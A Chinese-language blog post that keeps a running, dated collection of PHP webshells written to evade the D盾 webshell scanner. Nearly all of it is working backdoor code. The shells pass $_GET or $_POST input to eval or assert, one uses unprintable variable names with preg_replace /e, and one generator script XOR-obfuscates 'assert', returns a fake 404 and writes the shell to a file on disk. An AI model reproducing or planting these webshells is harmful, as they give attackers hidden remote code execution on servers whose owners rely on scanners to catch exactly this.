Y4er的博客
归档 专栏 分类 标签 笔记 朋友 作品
Y4er的博客

目录

PHP Webshell Bypass

Y4er  收录于  类别 bypass
     约 535 字  预计阅读 2 分钟 
目录
警告
本文最后更新于 2019-08-12,文中内容可能已过时。

准备写一个长期更新的免杀webshell总结

2019-10-12

一个符号bypass

https://forum.90sec.com/t/topic/513/1

1
2
3
4
5
6
7

<?php
function test($name){#
    eval($name);
}

test($_GET['code']);
?>

2019-08-15

https://evi1.cn/post/bypass-shell/

1
2
3

<?php
$a = $_POST['cmd'];
$var = "phpnb {${eval($a)}}";

2019-08-12

20190812215816

2019-08-09

疯狂免杀

20190809144327

2019-08-07

1
2
3
4
5
6
7

<?php
function a()
{
    return '' + @$_POST['a'];
}

eval(a());

再来一个三元表达式的

20190807111622

2019-08-06

常量过D盾

https://secquan.org/Notes/1069997

1
2
3
4
5
6
7
8

<?php
sprintf("123");
sprintf("123");
sprintf("123");
$a=$_GET['a'];
define("Test", "$a",true);
assert(TesT);
?>

另一种思路反序列化过D盾,代码自己写

再一种思路 创建对象重复定义变量成员过D盾

2019-05-30

ASCII码显示不出来的字符做变量过D盾

https://github.com/th1k404/unishell

http://ascii.911cha.com/

1
2
3
4
5
6

<?php
if($_GET['␄']){
    $␄=$_GET['␄'];
    @preg_replace("/abcde/e",$␄, "abcdefg");
}
?>

可以自己修改

2019-05-21

https://github.com/yzddmr6/webshell-venom

利用随机异或无限免杀d盾

蚁剑插件版请移步:

https://github.com/yzddmr6/as_webshell_venom

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

<?php
//code by Mr6
error_reporting(0);
	function randomkeys($length)   
{   
   $pattern = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
    }   
    return $key;   
}   
	function randname($length)   
{   
   $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
    }   
    return $key;   
} 
	$str=randomkeys(6); 
	$bname=randname(4);
	$lname=strrev(strtolower($bname));
	$str2="assert";
			echo "<?php \n";
			echo "header('HTTP/1.1 404');\n";
			echo "class  ".$bname."{ public \$c='';\nfunction __destruct(){\n";
	for ($i=0;$i<6;$i++)
	{
		$name="_".$i;
		$str3[$i]=bin2hex($str[$i] ^$str2[$i]);
		echo "$"."$name=";
	echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
	}
	$aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
	echo $aa;
	echo "\n";
	echo '@$db ("$this->c");}}';
	echo "\n";
	echo "\${$lname}=new {$bname}();\n";
	echo "@\${$lname}->c=\$_POST['Mr6'];\n";
	echo "?>\n";
	@$file=$_GET['file'];
	$html = ob_get_contents();
	if (isset($file)){
	if(file_put_contents($file,$html))
	echo "\n\n\n".$file."   save success!";}
	else {echo "Please input the file name like '?file=xxx.txt'";}
	?>

2019-05-11

1
2
3
4
5
6

<?php
function a(){
	return $a=$_POST['1'];
}
@assert(a());
?>

https://y4er.com/img/uploads/20190511171755.png

1
2
3
4
5

<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
	assert($value);
}

https://y4er.com/img/uploads/20190511183608.png

可以发现的规律是当已经定义的变量和循环的变量名一致时,D盾就不是那么敏感了

更新于 2019-08-12
 bypass
返回 | 主页